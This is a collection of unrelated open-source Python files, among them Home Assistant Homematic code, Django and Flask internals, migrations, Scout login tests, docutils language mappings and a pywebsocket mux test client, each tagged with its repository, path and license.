self._hmdevice.WRITENODE, self._hmdevice.EVENTNODE,
self._hmdevice.ACTIONNODE):
for node, channels in metadata.items():
# Data is needed for this instance
if node in self._data:
# chan is current channel
if len(channels) == 1:
channel = channels[0]
else:
channel = self._channel
# Prepare for subscription
try:
if int(channel) >= 0:
channels_to_sub.update({int(channel): True})
except (ValueError, TypeError):
_LOGGER.error("Invalid channel in metadata from %s",
self._name)
# Set callbacks
for channel in channels_to_sub:
_LOGGER.debug(
"Subscribe channel %d from %s", channel, self._name)
self._hmdevice.setEventCallback(
callback=self._hm_event_callback, bequeath=False,
channel=channel)
def _load_data_from_hm(self):
"""Load first value from pyhomematic."""
if not self._connected:
return False
# Read data from pyhomematic
for metadata, funct in (
(self._hmdevice.ATTRIBUTENODE,
self._hmdevice.getAttributeData),
(self._hmdevice.WRITENODE, self._hmdevice.getWriteData),
(self._hmdevice.SENSORNODE, self._hmdevice.getSensorData),
(self._hmdevice.BINARYNODE, self._hmdevice.getBinaryData)):
for node in metadata:
if metadata[node] and node in self._data:
self._data[node] = funct(name=node, channel=self._channel)
return True
def _hm_set_state(self, value):
"""Set data to main datapoint."""
if self._state in self._data:
self._data[self._state] = value
def _hm_get_state(self):
"""Get data from main datapoint."""
if self._state in self._data:
return self._data[self._state]
return None
def _init_data(self):
"""Generate a data dict (self._data) from the Homematic metadata."""
# Add all attributes to data dict
for data_note in self._hmdevice.ATTRIBUTENODE:
self._data.update({data_note: STATE_UNKNOWN})
# init device specified data
self._init_data_struct()
def _init_data_struct(self):
"""Generate a data dict from the Homematic device metadata."""
raise NotImplementedError
| mit |
DrMeers/django | tests/one_to_one/models.py | 26 | 1605 | """
10. One-to-one relationships
To define a one-to-one relationship, use ``OneToOneField()``.
In this example, a ``Place`` optionally can be a ``Restaurant``.
"""
from __future__ import unicode_literals
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class Place(models.Model):
name = models.CharField(max_length=50)
address = models.CharField(max_length=80)
def __str__(self):
return "%s the place" % self.name
@python_2_unicode_compatible
class Restaurant(models.Model):
place = models.OneToOneField(Place, primary_key=True)
serves_hot_dogs = models.BooleanField(default=False)
serves_pizza = models.BooleanField(default=False)
def __str__(self):
return "%s the restaurant" % self.place.name
@python_2_unicode_compatible
class Waiter(models.Model):
restaurant = models.ForeignKey(Restaurant)
name = models.CharField(max_length=50)
def __str__(self):
return "%s the waiter at %s" % (self.name, self.restaurant)
class ManualPrimaryKey(models.Model):
primary_key = models.CharField(max_length=10, primary_key=True)
name = models.CharField(max_length=50)
class RelatedModel(models.Model):
link = models.OneToOneField(ManualPrimaryKey)
name = models.CharField(max_length=50)
@python_2_unicode_compatible
class MultiModel(models.Model):
link1 = models.OneToOneField(Place)
link2 = models.OneToOneField(ManualPrimaryKey)
name = models.CharField(max_length=50)
def __str__(self):
return "Multimodel %s" % self.name
| bsd-3-clause |
justinlulejian/fah-gae | lib/flask/globals.py | 783 | 1137 | # -*- coding: utf-8 -*-
"""
flask.globals
~~~~~~~~~~~~~
Defines all the global objects that are proxies to the current
active context.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from functools import partial
from werkzeug.local import LocalStack, LocalProxy
def _lookup_req_object(name):
top = _request_ctx_stack.top
if top is None:
raise RuntimeError('working outside of request context')
return getattr(top, name)
def _lookup_app_object(name):
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return getattr(top, name)
def _find_app():
top = _app_ctx_stack.top
if top is None:
raise RuntimeError('working outside of application context')
return top.app
# context locals
_request_ctx_stack = LocalStack()
_app_ctx_stack = LocalStack()
current_app = LocalProxy(_find_app)
request = LocalProxy(partial(_lookup_req_object, 'request'))
session = LocalProxy(partial(_lookup_req_object, 'session'))
g = LocalProxy(partial(_lookup_app_object, 'g'))
| mit |
Nitrate/Nitrate | src/tcms/testruns/migrations/0006_set_assignee_and_tested_by_to_null_if_user_is_deleted.py | 2 | 1101 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-18 14:51
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("testruns", "0005_set_run_default_tester_to_null_if_user_is_deleted"),
]
operations = [
migrations.AlterField(
model_name="testcaserun",
name="assignee",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="case_run_assignee",
to=settings.AUTH_USER_MODEL,
),
),
migrations.AlterField(
model_name="testcaserun",
name="tested_by",
field=models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="case_run_tester",
to=settings.AUTH_USER_MODEL,
),
),
]
| gpl-2.0 |
Clinical-Genomics/scout | tests/server/blueprints/login/test_views.py | 1 | 2083 | # -*- coding: utf-8 -*-
from flask import url_for
from flask_ldap3_login.forms import LDAPLoginForm
from flask_login import current_user
from scout.server.extensions import store
def test_unathorized_login(app, institute_obj, case_obj):
"""Test failed authentication against scout database"""
# GIVEN an initialized app
# WHEN trying tp access scout with the email of an non-existing user
with app.test_client() as client:
resp = client.get(url_for("login.login", email="fakey_user@email.com"))
# THEN response should redirect to user authentication form (index page)
assert resp.status_code == 302
# And current user should NOT be authenticated
assert current_user.is_authenticated is False
def test_authorized_login(app, user_obj):
"""Test successful authentication against scout database"""
# GIVEN an initialized app
# WHEN trying to access scout with the email of an existing user
with app.test_client() as client:
resp = client.get(url_for("login.login", email=user_obj["email"]))
# THEN response should redirect to user institutes
assert resp.status_code == 302
# And current user should be authenticated
assert current_user.is_authenticated
def test_ldap_login(ldap_app, user_obj, monkeypatch):
"""Test authentication using LDAP"""
# Given a MonkeyPatched flask_ldap3_login authenticate functionality
def validate_ldap(*args, **kwargs):
return True
def return_user(*args, **kwargs):
return user_obj
monkeypatch.setattr(LDAPLoginForm, "validate_on_submit", validate_ldap)
monkeypatch.setattr(store, "user", return_user)
# GIVEN an initialized app with LDAP config params
with ldap_app.test_client() as client:
# When submitting LDAP username and password
form_data = {"username": "test_user", "password": "test_password"}
resp = client.post(url_for("login.login", **form_data))
# THEN current user should be authenticated
assert current_user.is_authenticated
| bsd-3-clause |
ol-loginov/intellij-community | python/helpers/docutils/parsers/rst/languages/eo.py | 57 | 3722 | # $Id: eo.py 4564 2006-05-21 20:44:42Z wiemann $
# Author: Marcelo Huerta San Martin <richieadler@users.sourceforge.net>
# Copyright: This module has been placed in the public domain.
# New language mappings are welcome. Before doing a new translation, please
# read <http://docutils.sf.net/docs/howto/i18n.html>. Two files must be
# translated for each language: one in docutils/languages, the other in
# docutils/parsers/rst/languages.
"""
Esperanto-language mappings for language-dependent features of
reStructuredText.
"""
__docformat__ = 'reStructuredText'
directives = {
# language-dependent: fixed
u'atentu': 'attention',
u'zorgu': 'caution',
u'dangxero': 'danger',
u'dan\u011dero': 'danger',
u'eraro': 'error',
u'spuro': 'hint',
u'grava': 'important',
u'noto': 'note',
u'helpeto': 'tip',
u'averto': 'warning',
u'admono': 'admonition',
u'flankteksto': 'sidebar',
u'temo': 'topic',
u'linea-bloko': 'line-block',
u'analizota-literalo': 'parsed-literal',
u'rubriko': 'rubric',
u'epigrafo': 'epigraph',
u'elstarajxoj': 'highlights',
u'elstara\u0135oj': 'highlights',
u'ekstera-citajxo': 'pull-quote',
u'ekstera-cita\u0135o': 'pull-quote',
u'kombinajxo': 'compound',
u'kombina\u0135o': 'compound',
u'tekstingo': 'container',
u'enhavilo': 'container',
#'questions': 'questions',
#'qa': 'questions',
#'faq': 'questions',
u'tabelo': 'table',
u'tabelo-vdk': 'csv-table', # "valoroj disigitaj per komoj"
u'tabelo-csv': 'csv-table',
u'tabelo-lista': 'list-table',
u'meta': 'meta',
#'imagemap': 'imagemap',
u'bildo': 'image',
u'figuro': 'figure',
u'inkludi': 'include',
u'senanaliza': 'raw',
u'anstatauxi': 'replace',
u'anstata\u016di': 'replace',
u'unicode': 'unicode',
u'dato': 'date',
u'klaso': 'class',
u'rolo': 'role',
u'preterlasita-rolo': 'default-role',
u'titolo': 'title',
u'enhavo': 'contents',
u'seknum': 'sectnum',
u'sekcia-numerado': 'sectnum',
u'kapsekcio': 'header',
u'piedsekcio': 'footer',
#'footnotes': 'footnotes',
#'citations': 'citations',
u'celaj-notoj': 'target-notes',
u'restructuredtext-test-directive': 'restructuredtext-test-directive'}
"""Esperanto name to registered (in directives/__init__.py) directive name
mapping."""
roles = {
# language-dependent: fixed
u'mallongigo': 'abbreviation',
u'mall': 'abbreviation',
u'komenclitero': 'acronym',
u'kl': 'acronym',
u'indekso': 'index',
u'i': 'index',
u'subskribo': 'subscript',
u'sub': 'subscript',
u'supraskribo': 'superscript',
u'sup': 'superscript',
u'titola-referenco': 'title-reference',
u'titolo': 'title-reference',
u't': 'title-reference',
u'pep-referenco': 'pep-reference',
u'pep': 'pep-reference',
u'rfc-referenco': 'rfc-reference',
u'rfc': 'rfc-reference',
u'emfazo': 'emphasis',
u'forta': 'strong',
u'litera': 'literal',
u'nomita-referenco': 'named-reference',
u'nenomita-referenco': 'anonymous-reference',
u'piednota-referenco': 'footnote-reference',
u'citajxo-referenco': 'citation-reference',
u'cita\u0135o-referenco': 'citation-reference',
u'anstatauxa-referenco': 'substitution-reference',
u'anstata\u016da-referenco': 'substitution-reference',
u'celo': 'target',
u'uri-referenco': 'uri-reference',
u'uri': 'uri-reference',
u'url': 'uri-reference',
u'senanaliza': 'raw',
}
"""Mapping of Esperanto role names to canonical role names for interpreted text.
"""
| apache-2.0 |
qedsoftware/commcare-hq | corehq/apps/smsbillables/migrations/0005_update_http_backend_criteria.py | 1 | 1081 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from corehq.apps.smsbillables.models import SmsGatewayFeeCriteria
from corehq.messaging.smsbackends.sislog.models import SQLSislogBackend
from corehq.messaging.smsbackends.yo.models import SQLYoBackend
from corehq.sql_db.operations import HqRunPython
def update_http_backend_criteria(apps, schema_editor):
SmsGatewayFeeCriteria.objects.filter(
backend_api_id='HTTP',
backend_instance='7ddf3301c093b793c6020ebf755adb6f'
).update(
backend_api_id=SQLSislogBackend.get_api_id(),
backend_instance=None,
)
SmsGatewayFeeCriteria.objects.filter(
backend_api_id='HTTP',
backend_instance='95a4f0929cddb966e292e70a634da716'
).update(
backend_api_id=SQLYoBackend.get_api_id(),
backend_instance=None,
)
class Migration(migrations.Migration):
dependencies = [
('smsbillables', '0004_bootstrap_smsgh_rates'),
]
operations = {
HqRunPython(update_http_backend_criteria),
}
| bsd-3-clause |
indashnet/InDashNet.Open.UN2000 | android/external/chromium-trace/trace-viewer/third_party/pywebsocket/src/test/mux_client_for_testing.py | 29 | 27698 | #!/usr/bin/env python
#
# Copyright 2012, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""WebSocket client utility for testing mux extension.
This code should be independent from mod_pywebsocket. See the comment of
client_for_testing.py.
NOTE: This code is far from robust like client_for_testing.py.
"""
import Queue
import base64
import collections
import email
import email.parser
import logging
import math
import os
import random
import socket
import struct
import threading
from mod_pywebsocket import util
from test import client_for_testing
_CONTROL_CHANNEL_ID = 0
_DEFAULT_CHANNEL_ID = 1
_MUX_OPCODE_ADD_CHANNEL_REQUEST = 0
_MUX_OPCODE_ADD_CHANNEL_RESPONSE = 1
_MUX_OPCODE_FLOW_CONTROL = 2
_MUX_OPCODE_DROP_CHANNEL = 3
_MUX_OPCODE_NEW_CHANNEL_SLOT = 4
class _ControlBlock:
def __init__(self, opcode):
self.opcode = opcode
def _parse_handshake_response(response):
status_line, header_lines = response.split('\r\n', 1)
words = status_line.split(' ')
if len(words) < 3:
raise ValueError('Bad Status-Line syntax %r' % status_line)
[version, response_code] = words[:2]
if version != 'HTTP/1.1':
raise ValueError('Bad response version %r' % version)
if response_code != '101':
raise ValueError('Bad response code %r ' % response_code)
headers = email.parser.Parser().parsestr(header_lines)
return headers
def _parse_channel_id(data, offset=0):
length = len(data)
remaining = length - offset
if remaining <= 0:
raise Exception('No channel id found')
channel_id = ord(data[offset])
channel_id_length = 1
if channel_id & 0xe0 == 0xe0:
if remaining < 4:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!L',
data[offset:offset+4])[0] & 0x1fffffff
channel_id_length = 4
elif channel_id & 0xc0 == 0xc0:
if remaining < 3:
raise Exception('Invalid channel id format')
channel_id = (((channel_id & 0x1f) << 16) +
struct.unpack('!H', data[offset+1:offset+3])[0])
channel_id_length = 3
elif channel_id & 0x80 == 0x80:
if remaining < 2:
raise Exception('Invalid channel id format')
channel_id = struct.unpack('!H', data[offset:offset+2])[0] & 0x3fff
channel_id_length = 2
return channel_id, channel_id_length
def _read_number(data, size_of_size, offset=0):
if size_of_size == 1:
return ord(data[offset])
elif size_of_size == 2:
return struct.unpack('!H', data[offset:offset+2])[0]
elif size_of_size == 3:
return ((ord(data[offset]) << 16)
+ struct.unpack('!H', data[offset+1:offset+3])[0])
elif size_of_size == 4:
return struct.unpack('!L', data[offset:offset+4])[0]
else:
raise Exception('Invalid "size of size" in control block')
def _parse_control_block_specific_data(data, size_of_size, offset=0):
remaining = len(data) - offset
if remaining < size_of_size:
raise Exception('Invalid control block received')
size = _read_number(data, size_of_size, offset)
start_position = offset + size_of_size
end_position = start_position + size
if len(data) < end_position:
raise Exception('Invalid size of control block (%d < %d)' % (
len(data), end_position))
return data[start_position:end_position], size_of_size + size
def _parse_control_blocks(data):
blocks = []
length = len(data)
pos = 0
while pos < length:
first_byte = ord(data[pos])
pos += 1
opcode = (first_byte >> 5) & 0x7
block = _ControlBlock(opcode)
# TODO(bashi): Support more opcode
if opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
block.encode = (first_byte >> 2) & 3
block.rejected = (first_byte >> 4) & 1
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
size_of_size = (first_byte & 3) + 1
encoded_handshake, advance = _parse_control_block_specific_data(
data, size_of_size, pos)
block.encoded_handshake = encoded_handshake
pos += advance
blocks.append(block)
elif opcode == _MUX_OPCODE_DROP_CHANNEL:
block.mux_error = (first_byte >> 4) & 1
channel_id, channel_id_length = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += channel_id_length
size_of_size = first_byte & 3
reason, size = _parse_control_block_specific_data(
data, size_of_size, pos)
block.reason = reason
pos += size
blocks.append(block)
elif opcode == _MUX_OPCODE_FLOW_CONTROL:
channel_id, advance = _parse_channel_id(data, pos)
block.channel_id = channel_id
pos += advance
size_of_quota = (first_byte & 3) + 1
block.send_quota = _read_number(data, size_of_quota, pos)
pos += size_of_quota
blocks.append(block)
elif opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
size_of_slots = ((first_byte >> 2) & 3) + 1
size_of_quota = (first_byte & 3) + 1
block.slots = _read_number(data, size_of_slots, pos)
pos += size_of_slots
block.send_quota = _read_number(data, size_of_quota, pos)
pos += size_of_quota
blocks.append(block)
else:
raise Exception(
'Unsupported mux opcode %d received' % opcode)
return blocks
def _encode_channel_id(channel_id):
if channel_id < 0:
raise ValueError('Channel id %d must not be negative' % channel_id)
if channel_id < 2 ** 7:
return chr(channel_id)
if channel_id < 2 ** 14:
return struct.pack('!H', 0x8000 + channel_id)
if channel_id < 2 ** 21:
first = chr(0xc0 + (channel_id >> 16))
return first + struct.pack('!H', channel_id & 0xffff)
if channel_id < 2 ** 29:
return struct.pack('!L', 0xe0000000 + channel_id)
raise ValueError('Channel id %d is too large' % channel_id)
def _size_of_number_in_bytes_minus_1(number):
# Calculate the minimum number of bytes minus 1 that are required to store
# the data.
if number < 0:
raise ValueError('Invalid number: %d' % number)
elif number < 2 ** 8:
return 0
elif number < 2 ** 16:
return 1
elif number < 2 ** 24:
return 2
elif number < 2 ** 32:
return 3
else:
raise ValueError('Invalid number %d' % number)
def _encode_number(number):
if number < 2 ** 8:
return chr(number)
elif number < 2 ** 16:
return struct.pack('!H', number)
elif number < 2 ** 24:
return chr(number >> 16) + struct.pack('!H', number & 0xffff)
else:
return struct.pack('!L', number)
def _create_add_channel_request(channel_id, encoded_handshake,
encoding=0):
length = len(encoded_handshake)
size_of_length = _size_of_number_in_bytes_minus_1(length)
first_byte = ((_MUX_OPCODE_ADD_CHANNEL_REQUEST << 5) | (encoding << 2) |
size_of_length)
encoded_length = _encode_number(length)
return (chr(first_byte) + _encode_channel_id(channel_id) +
encoded_length + encoded_handshake)
def _create_flow_control(channel_id, replenished_quota):
size_of_quota = _size_of_number_in_bytes_minus_1(replenished_quota)
first_byte = ((_MUX_OPCODE_FLOW_CONTROL << 5) | size_of_quota)
return (chr(first_byte) + _encode_channel_id(channel_id) +
_encode_number(replenished_quota))
class _MuxReaderThread(threading.Thread):
"""Mux reader thread.
Reads frames and passes them to the mux client. This thread accesses
private functions/variables of the mux client.
"""
def __init__(self, mux):
threading.Thread.__init__(self)
self.setDaemon(True)
self._mux = mux
self._stop_requested = False
def _receive_message(self):
first_opcode = None
pending_payload = []
while not self._stop_requested:
fin, rsv1, rsv2, rsv3, opcode, payload_length = (
client_for_testing.read_frame_header(self._mux._socket))
if not first_opcode:
if opcode == client_for_testing.OPCODE_TEXT:
raise Exception('Received a text message on physical '
'connection')
if opcode == client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received an intermediate frame but '
'fragmentation was not started')
if (opcode == client_for_testing.OPCODE_BINARY or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_PONG or
opcode == client_for_testing.OPCODE_CLOSE):
first_opcode = opcode
else:
raise Exception('Received an undefined opcode frame: %d' %
opcode)
elif opcode != client_for_testing.OPCODE_CONTINUATION:
raise Exception('Received a new opcode before '
'terminating fragmentation')
payload = client_for_testing.receive_bytes(
self._mux._socket, payload_length)
if self._mux._incoming_frame_filter is not None:
payload = self._mux._incoming_frame_filter.filter(payload)
pending_payload.append(payload)
if fin:
break
if self._stop_requested:
return None, None
message = ''.join(pending_payload)
return first_opcode, message
def request_stop(self):
self._stop_requested = True
def run(self):
try:
while not self._stop_requested:
# opcode is OPCODE_BINARY or control opcodes when a message
# is succesfully received.
opcode, message = self._receive_message()
if not opcode:
return
if opcode == client_for_testing.OPCODE_BINARY:
channel_id, advance = _parse_channel_id(message)
self._mux._dispatch_frame(channel_id, message[advance:])
else:
self._mux._process_control_message(opcode, message)
finally:
self._mux._notify_reader_done()
class _InnerFrame(object):
def __init__(self, fin, rsv1, rsv2, rsv3, opcode, payload):
self.fin = fin
self.rsv1 = rsv1
self.rsv2 = rsv2
self.rsv3 = rsv3
self.opcode = opcode
self.payload = payload
class _LogicalChannelData(object):
def __init__(self):
self.queue = Queue.Queue()
self.send_quota = 0
self.receive_quota = 0
class MuxClient(object):
"""WebSocket mux client.
Note that this class is NOT thread-safe. Do not access an instance of this
class from multiple threads at a same time.
"""
def __init__(self, options):
self._logger = util.get_class_logger(self)
self._options = options
self._options.enable_mux()
self._stream = None
self._socket = None
self._handshake = client_for_testing.WebSocketHandshake(self._options)
self._incoming_frame_filter = None
self._outgoing_frame_filter = None
self._is_active = False
self._read_thread = None
self._control_blocks_condition = threading.Condition()
self._control_blocks = []
self._channel_slots = collections.deque()
self._logical_channels_condition = threading.Condition();
self._logical_channels = {}
self._timeout = 2
self._physical_connection_close_event = None
self._physical_connection_close_message = None
def _parse_inner_frame(self, data):
if len(data) == 0:
raise Exception('Invalid encapsulated frame received')
first_byte = ord(data[0])
fin = (first_byte << 7) & 1
rsv1 = (first_byte << 6) & 1
rsv2 = (first_byte << 5) & 1
rsv3 = (first_byte << 4) & 1
opcode = first_byte & 0xf
if self._outgoing_frame_filter:
payload = self._outgoing_frame_filter.filter(
data[1:])
else:
payload = data[1:]
return _InnerFrame(fin, rsv1, rsv2, rsv3, opcode, payload)
def _process_mux_control_blocks(self):
for block in self._control_blocks:
if block.opcode == _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
# AddChannelResponse will be handled in add_channel().
continue
elif block.opcode == _MUX_OPCODE_FLOW_CONTROL:
try:
self._logical_channels_condition.acquire()
if not block.channel_id in self._logical_channels:
raise Exception('Invalid flow control received for '
'channel id %d' % block.channel_id)
self._logical_channels[block.channel_id].send_quota += (
block.send_quota)
self._logical_channels_condition.notify()
finally:
self._logical_channels_condition.release()
elif block.opcode == _MUX_OPCODE_NEW_CHANNEL_SLOT:
self._channel_slots.extend([block.send_quota] * block.slots)
def _dispatch_frame(self, channel_id, payload):
if channel_id == _CONTROL_CHANNEL_ID:
try:
self._control_blocks_condition.acquire()
self._control_blocks += _parse_control_blocks(payload)
self._process_mux_control_blocks()
self._control_blocks_condition.notify()
finally:
self._control_blocks_condition.release()
else:
try:
self._logical_channels_condition.acquire()
if not channel_id in self._logical_channels:
raise Exception('Received logical frame on channel id '
'%d, which is not established' %
channel_id)
inner_frame = self._parse_inner_frame(payload)
self._logical_channels[channel_id].receive_quota -= (
len(inner_frame.payload))
if self._logical_channels[channel_id].receive_quota < 0:
raise Exception('The server violates quota on '
'channel id %d' % channel_id)
finally:
self._logical_channels_condition.release()
self._logical_channels[channel_id].queue.put(inner_frame)
def _process_control_message(self, opcode, message):
# Ping/Pong are not supported.
if opcode == client_for_testing.OPCODE_CLOSE:
self._physical_connection_close_message = message
if self._is_active:
self._stream.send_close(
code=client_for_testing.STATUS_NORMAL_CLOSURE, reason='')
self._read_thread.request_stop()
if self._physical_connection_close_event:
self._physical_connection_close_event.set()
def _notify_reader_done(self):
self._logger.debug('Read thread terminated.')
self.close_socket()
def _assert_channel_slot_available(self):
try:
self._control_blocks_condition.acquire()
if len(self._channel_slots) == 0:
# Wait once
self._control_blocks_condition.wait(timeout=self._timeout)
finally:
self._control_blocks_condition.release()
if len(self._channel_slots) == 0:
raise Exception('Failed to receive NewChannelSlot')
def _assert_send_quota_available(self, channel_id):
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota == 0:
# Wait once
self._logical_channels_condition.wait(timeout=self._timeout)
finally:
self._logical_channels_condition.release()
if self._logical_channels[channel_id].send_quota == 0:
raise Exception('Failed to receive FlowControl for channel id %d' %
channel_id)
def connect(self):
self._socket = socket.socket()
self._socket.settimeout(self._options.socket_timeout)
self._socket.connect((self._options.server_host,
self._options.server_port))
if self._options.use_tls:
self._socket = _TLSSocket(self._socket)
self._handshake.handshake(self._socket)
self._stream = client_for_testing.WebSocketStream(
self._socket, self._handshake)
self._logical_channels[_DEFAULT_CHANNEL_ID] = _LogicalChannelData()
self._read_thread = _MuxReaderThread(self)
self._read_thread.start()
self._assert_channel_slot_available()
self._assert_send_quota_available(_DEFAULT_CHANNEL_ID)
self._is_active = True
self._logger.info('Connection established')
def add_channel(self, channel_id, options):
if not self._is_active:
raise Exception('Mux client is not active')
if channel_id in self._logical_channels:
raise Exception('Channel id %d already exists' % channel_id)
try:
send_quota = self._channel_slots.popleft()
except IndexError, e:
raise Exception('No channel slots: %r' % e)
# Create AddChannel request
request_line = 'GET %s HTTP/1.1\r\n' % options.resource
fields = []
fields.append('Upgrade: websocket\r\n')
fields.append('Connection: Upgrade\r\n')
if options.server_port == client_for_testing.DEFAULT_PORT:
fields.append('Host: %s\r\n' % options.server_host.lower())
else:
fields.append('Host: %s:%d\r\n' % (options.server_host.lower(),
options.server_port))
fields.append('Origin: %s\r\n' % options.origin.lower())
original_key = os.urandom(16)
key = base64.b64encode(original_key)
fields.append('Sec-WebSocket-Key: %s\r\n' % key)
fields.append('Sec-WebSocket-Version: 13\r\n')
if len(options.extensions) > 0:
fields.append('Sec-WebSocket-Extensions: %s\r\n' %
', '.join(options.extensions))
handshake = request_line + ''.join(fields) + '\r\n'
add_channel_request = _create_add_channel_request(
channel_id, handshake)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + add_channel_request
self._stream.send_binary(payload)
# Wait AddChannelResponse
self._logger.debug('Waiting AddChannelResponse for the request...')
response = None
try:
self._control_blocks_condition.acquire()
while True:
for block in self._control_blocks:
if block.opcode != _MUX_OPCODE_ADD_CHANNEL_RESPONSE:
continue
if block.channel_id == channel_id:
response = block
self._control_blocks.remove(response)
break
if response:
break
self._control_blocks_condition.wait(self._timeout)
if not self._is_active:
raise Exception('AddChannelRequest timed out')
finally:
self._control_blocks_condition.release()
# Validate AddChannelResponse
if response.rejected:
raise Exception('The server rejected AddChannelRequest')
fields = _parse_handshake_response(response.encoded_handshake)
if not 'upgrade' in fields:
raise Exception('No Upgrade header')
if fields['upgrade'] != 'websocket':
raise Exception('Wrong Upgrade header')
if not 'connection' in fields:
raise Exception('No Connection header')
if fields['connection'] != 'Upgrade':
raise Exception('Wrong Connection header')
if not 'sec-websocket-accept' in fields:
raise Exception('No Sec-WebSocket-Accept header')
accept = fields['sec-websocket-accept']
try:
decoded_accept = base64.b64decode(accept)
except TypeError, e:
raise Exception(
'Illegal value for header Sec-WebSocket-Accept: ' + accept)
if len(decoded_accept) != 20:
raise Exception(
'Decoded value of Sec-WebSocket-Accept is not 20-byte long')
original_expected_accept = util.sha1_hash(
key + client_for_testing.WEBSOCKET_ACCEPT_UUID).digest()
expected_accept = base64.b64encode(original_expected_accept)
if accept != expected_accept:
raise Exception(
'Invalid Sec-WebSocket-Accept header: %r (expected) != %r '
'(actual)' % (accept, expected_accept))
self._logical_channels_condition.acquire()
self._logical_channels[channel_id] = _LogicalChannelData()
self._logical_channels[channel_id].send_quota = send_quota
self._logical_channels_condition.release()
self._logger.debug('Logical channel %d established' % channel_id)
def _check_logical_channel_is_opened(self, channel_id):
if not self._is_active:
raise Exception('Mux client is not active')
if not channel_id in self._logical_channels:
raise Exception('Logical channel %d is not established.')
def drop_channel(self, channel_id):
# TODO(bashi): Implement
pass
def send_flow_control(self, channel_id, replenished_quota):
self._check_logical_channel_is_opened(channel_id)
flow_control = _create_flow_control(channel_id, replenished_quota)
payload = _encode_channel_id(_CONTROL_CHANNEL_ID) + flow_control
# Replenish receive quota
try:
self._logical_channels_condition.acquire()
self._logical_channels[channel_id].receive_quota += (
replenished_quota)
finally:
self._logical_channels_condition.release()
self._stream.send_binary(payload)
def send_message(self, channel_id, message, end=True, binary=False):
self._check_logical_channel_is_opened(channel_id)
if binary:
first_byte = (end << 7) | client_for_testing.OPCODE_BINARY
else:
first_byte = (end << 7) | client_for_testing.OPCODE_TEXT
message = message.encode('utf-8')
try:
self._logical_channels_condition.acquire()
if self._logical_channels[channel_id].send_quota < len(message):
raise Exception('Send quota violation: %d < %d' % (
self._logical_channels[channel_id].send_quota,
len(message)))
self._logical_channels[channel_id].send_quota -= len(message)
finally:
self._logical_channels_condition.release()
payload = _encode_channel_id(channel_id) + chr(first_byte) + message
self._stream.send_binary(payload)
def assert_receive(self, channel_id, payload, binary=False):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if binary:
opcode = client_for_testing.OPCODE_BINARY
else:
opcode = client_for_testing.OPCODE_TEXT
if inner_frame.opcode != opcode:
raise Exception('Unexpected opcode received (%r != %r)' %
(expected_opcode, inner_frame.opcode))
if inner_frame.payload != payload:
raise Exception('Unexpected payload received')
def send_close(self, channel_id, code=None, reason=''):
self._check_logical_channel_is_opened(channel_id)
if code is not None:
body = struct.pack('!H', code) + reason.encode('utf-8')
else:
body = ''
first_byte = (1 << 7) | client_for_testing.OPCODE_CLOSE
payload = _encode_channel_id(channel_id) + chr(first_byte) + body
self._stream.send_binary(payload)
def assert_receive_close(self, channel_id):
self._check_logical_channel_is_opened(channel_id)
try:
inner_frame = self._logical_channels[channel_id].queue.get(
timeout=self._timeout)
except Queue.Empty, e:
raise Exception('Cannot receive message from channel id %d' %
channel_id)
if inner_frame.opcode != client_for_testing.OPCODE_CLOSE:
raise Exception('Didn\'t receive close frame')
def send_physical_connection_close(self, code=None, reason=''):
self._physical_connection_close_event = threading.Event()
self._stream.send_close(code, reason)
# This method can be used only after calling
# send_physical_connection_close().
def assert_physical_connection_receive_close(
self, code=client_for_testing.STATUS_NORMAL_CLOSURE, reason=''):
self._physical_connection_close_event.wait(timeout=self._timeout)
if (not self._physical_connection_close_event.isSet() or
not self._physical_connection_close_message):
raise Exception('Didn\'t receive closing handshake')
def close_socket(self):
self._is_active = False
self._socket.close()
